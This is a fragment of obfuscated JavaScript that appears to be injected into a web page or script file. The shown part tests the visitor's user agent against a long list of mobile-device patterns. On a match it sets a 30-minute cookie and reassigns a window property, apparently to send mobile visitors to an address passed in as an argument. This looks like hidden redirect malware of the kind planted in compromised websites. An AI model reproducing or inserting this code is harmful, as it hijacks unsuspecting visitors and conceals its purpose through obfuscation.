)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}